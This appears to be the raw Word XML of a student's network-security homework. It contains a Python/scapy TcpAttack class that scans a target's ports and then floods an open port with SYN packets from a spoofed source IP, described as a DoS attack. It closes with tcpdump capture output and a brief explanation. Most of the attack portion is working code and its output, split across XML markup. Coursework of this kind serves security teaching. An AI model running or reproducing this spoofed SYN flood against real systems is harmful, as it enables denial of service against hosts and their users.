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5133" w14:textId="0649F7E9" w:rsidR="00BA617E" w:rsidRPr="00BA617E" w:rsidRDefault="00BA617E" w:rsidP="00BA61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Homework Number: hw8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># Name: Jiaxing Yang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># ECN Login: yang1274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># Due Date: 3/26/2020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sys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socket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scapy.all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#This is from the lecture downloaded code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"""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for i in range(count):                                                       #(5)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IP_header = IP(src = srcIP, dst = destIP)                                #(6)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TCP_header = TCP(flags = "S", sport = RandShort(), dport = destPort)     #(7)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packet = IP_header / TCP_header                                          #(8)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try:                                                                     #(9)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send(packet)                                                          #(10)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except Exception as e:                                                   #(11)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print e                                                          #(11)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"""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"""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open_ports = []                                                              #(5)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# Scan the ports in the specified range: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for testport in range(start_port, end_port+1):                               #(6)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sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )               #(7)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sock.settimeout(0.1)                                                     #(8)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try:                                                                     #(9)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sock.connect( (dst_host, testport) )                                 #(10)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open_ports.append(testport)                                          #(11)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if verbosity: print testport                                         #(12)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sys.stdout.write("%s" % testport)                                    #(13)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sys.stdout.flush()                                                   #(14)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except:                                                                  #(15)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if verbosity: print "Port closed: ", testport                        #(16)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sys.stdout.write(".")                                                #(17)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sys.stdout.flush()                                                   #(18)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>"""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#rangeStart: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TcpAttack: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#spoofIP: String containing the IP address to spoof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#targetIP: String containing the IP address of the target computer to attack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A617E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="B200B2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>__init__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spoofIP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targetIP):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.srcIP = spoofIP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.destIP = targetIP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  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#init the open_ports here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.open_ports = []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rangeStart: Integer designating the first port in the range of ports being scanned.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rangeEnd: Integer designating the last port in the range of ports being scanned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No return value, but writes open ports to openports.txt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#port scan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A617E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFC66D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scanTarget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rangeStart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rangeEnd):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file_out = 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"openports.txt"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"w"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port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(rangeStart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rangeEnd+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sock = socket.socket(socket.AF_INET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socket.SOCK_STREAM)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sock.settimeout(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0.1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(9)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sock.connect((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.destIP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port))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(10)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.open_ports.append(port)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(11)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except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(15)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port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.open_ports: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file_out.write(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(port) + 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file_out.close()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port: Integer designating the port that the attack will use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numSyn: Integer of SYN packets to send to target IP address at the given port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If the port is open, perform DoS attack and return 1. Otherwise return 0.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A617E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFC66D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attackTarget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port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numSyn):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port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not in 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.open_ports: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num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(numSyn):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#this is from lecture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IP_header = IP(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA617E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="AA4926"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src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.srcIP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A4926"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dst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A617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.destIP)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(6)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TCP_header = TCP(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA617E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="AA4926"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flags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"S"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A4926"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sport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=RandShort()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A4926"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dport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=port)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(7)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packet = IP_header / TCP_header  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t># (8)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA617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send(packet)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 xml:space="preserve">Exception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e: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(e)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spoofIP = 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="00D53091">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>11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3.</w:t>
      </w:r>
      <w:r w:rsidR="00D53091">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>11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3.</w:t>
      </w:r>
      <w:r w:rsidR="00D53091">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>11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3.</w:t>
      </w:r>
      <w:r w:rsidR="00D53091">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>11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3"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 xml:space="preserve">targetIP = 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"192.168.0.28"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 xml:space="preserve">   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Tcp = TcpAttack(spoofIP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targetIP)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Tcp.scanTarget(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(Tcp.attackTarget(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135</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA617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617E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617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617E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'port was open to attack'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA617E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39657BEE" w14:textId="7530CD6A" w:rsidR="00672AC6" w:rsidRDefault="00672AC6"/>
    <w:p w14:paraId="6C454288" w14:textId="38165251" w:rsidR="00D53091" w:rsidRDefault="00D53091"/>
    <w:p w14:paraId="4B60D174" w14:textId="5C503BC9" w:rsidR="00D53091" w:rsidRDefault="00D53091"/>
    <w:p w14:paraId="0D127666" w14:textId="696A55CA" w:rsidR="00D53091" w:rsidRDefault="00D53091">
      <w:r>
        <w:t>The output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F3D10B" w14:textId="35A5305D" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>:53:36.339332 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 64, bad cksum 0 (-&gt;68b1)!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA76126" w14:textId="1CE01AD8" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:t xml:space="preserve">    172.16.60.243.52666 &gt; 172.16.60.243.</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>99: Flags [S], cksum 0xd</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>9 (incorrect -&gt; 0xcdd5), seq 2258254457, win 65535, options [mss 16344,nop,wscale 6,nop,nop,TS val 691575701 ecr 0,sackOK,eol], length 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F46B397" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0000:  0200 0000 4500 0040 0000 4000 4006 0000  ....E..@..@.@...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466477F4" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0010:  ac10 3cf3 ac10 3cf3 cdba 095f 869a 3a79  ..&lt;...&lt;...._..:y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175AAC27" w14:textId="30482C12" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0020:  0000 0000 b002 ffff d</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>9 0000 0204 3fd8  .........9....?.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8B05D9" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0030:  0103 0306 0101 080a 2938 9b95 0000 0000  ........)8......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C19B7" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0040:  0402 0000                                ....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A23710C" w14:textId="41262023" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>:53:36.339337 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40, bad cksum 0 (-&gt;68c9)!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4C4F4" w14:textId="4E5ADFAB" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:t xml:space="preserve">    172.16.60.243.</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>99 &gt; 172.16.60.243.52666: Flags [R.], cksum 0xd221 (incorrect -&gt; 0x459b), seq 0, ack 2258254458, win 0, length 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF4BE8C" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0000:  0200 0000 4500 0028 0000 4000 4006 0000  ....E..(..@.@...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613EEF14" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0010:  ac10 3cf3 ac10 3cf3 095f cdba 0000 0000  ..&lt;...&lt;.._......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666B399" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0020:  869a 3a7a 5014 0000 d221 0000            ..:zP....!..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D04CC8C" w14:textId="2D5121B1" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>:53:36.339338 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40, bad cksum 0 (-&gt;68c9)!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C27FA23" w14:textId="694E4425" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:t xml:space="preserve">    172.16.60.243.</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>99 &gt; 172.16.60.243.52666: Flags [R.], cksum 0xd221 (incorrect -&gt; 0x459b), seq 0, ack 2258254458, win 0, length 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B4047A" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0000:  0200 0000 4500 0028 0000 4000 4006 0000  ....E..(..@.@...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191CAE97" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0010:  ac10 3cf3 ac10 3cf3 095f cdba 0000 0000  ..&lt;...&lt;.._......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C628A67" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0020:  869a 3a7a 5014 0000 d221 0000            ..:zP....!..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B64906B" w14:textId="621A8668" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>:53:36.339439 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 64, bad cksum 0 (-&gt;68b1)!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C055495" w14:textId="470F7C41" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:t xml:space="preserve">    172.16.60.243.52667 &gt; 172.16.60.243.2400: Flags [S], cksum 0xd</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>9 (incorrect -&gt; 0xe104), seq 1044475809, win 65535, options [mss 16344,nop,wscale 6,nop,nop,TS val 691575701 ecr 0,sackOK,eol], length 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438A8769" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0000:  0200 0000 4500 0040 0000 4000 4006 0000  ....E..@..@.@...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34799239" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0010:  ac10 3cf3 ac10 3cf3 cdbb 0960 3e41 6fa1  ..&lt;...&lt;....`&gt;Ao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB6EB2" w14:textId="0C379662" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0020:  0000 0000 b002 ffff d</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>9 0000 0204 3fd8  .........9....?.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01028247" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0030:  0103 0306 0101 080a 2938 9b95 0000 0000  ........)8......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584C8893" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0040:  0402 0000                                ....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2064BF" w14:textId="102E8CE8" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>:53:36.339446 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 64, bad cksum 0 (-&gt;68b1)!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C59D32" w14:textId="0DB7C29E" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:t xml:space="preserve">    172.16.60.243.52667 &gt; 172.16.60.243.2400: Flags [S], cksum 0xd</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>9 (incorrect -&gt; 0xe104), seq 1044475809, win 65535, options [mss 16344,nop,wscale 6,nop,nop,TS val 691575701 ecr 0,sackOK,eol], length 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2C6EA3" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0000:  0200 0000 4500 0040 0000 4000 4006 0000  ....E..@..@.@...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D5D93" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0010:  ac10 3cf3 ac10 3cf3 cdbb 0960 3e41 6fa1  ..&lt;...&lt;....`&gt;Ao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B9BA1" w14:textId="0A911BC6" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0020:  0000 0000 b002 ffff d</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>9 0000 0204 3fd8  .........9....?.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E576B" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t>0x0030:  0103 0306 0101 080a 2938 9b95 0000 0000  ........)8......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5376E" w14:textId="77777777" w:rsidR="00D97CFD" w:rsidRDefault="00D97CFD" w:rsidP="00D97CFD">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0x0040:  0402 0000  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA9FEE7" w14:textId="6F5D1322" w:rsidR="00D53091" w:rsidRDefault="00D53091" w:rsidP="00D97CFD">
      <w:r>
        <w:t xml:space="preserve">Where the flag of each indicates the 3-wake hand shake status, and it performs the complete 3 way handshake in each packet I sent. </w:t>
      </w:r>
      <w:r w:rsidR="00D97CFD">
        <w:t>Where flags = [S] is the packets I sent.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4CB71A23" w14:textId="27729220" w:rsidR="00D53091" w:rsidRDefault="00D53091" w:rsidP="00D53091"/>
    <w:p w14:paraId="715C99A8" w14:textId="087FBF8A" w:rsidR="00D53091" w:rsidRDefault="00D53091" w:rsidP="00D53091"/>
    <w:p w14:paraId="27E3CE33" w14:textId="77777777" w:rsidR="00D53091" w:rsidRDefault="00D53091" w:rsidP="00D53091"/>
    <w:sectPr w:rsidR="00D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7E"/>
    <w:rsid w:val="00672AC6"/>
    <w:rsid w:val="00BA617E"/>
    <w:rsid w:val="00D53091"/>
    <w:rsid w:val="00D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40F6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0557FBA5-D0B7-41B8-8BEE-66F1504A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Yang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jiaxing Yang</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-26T20:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-26T20:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>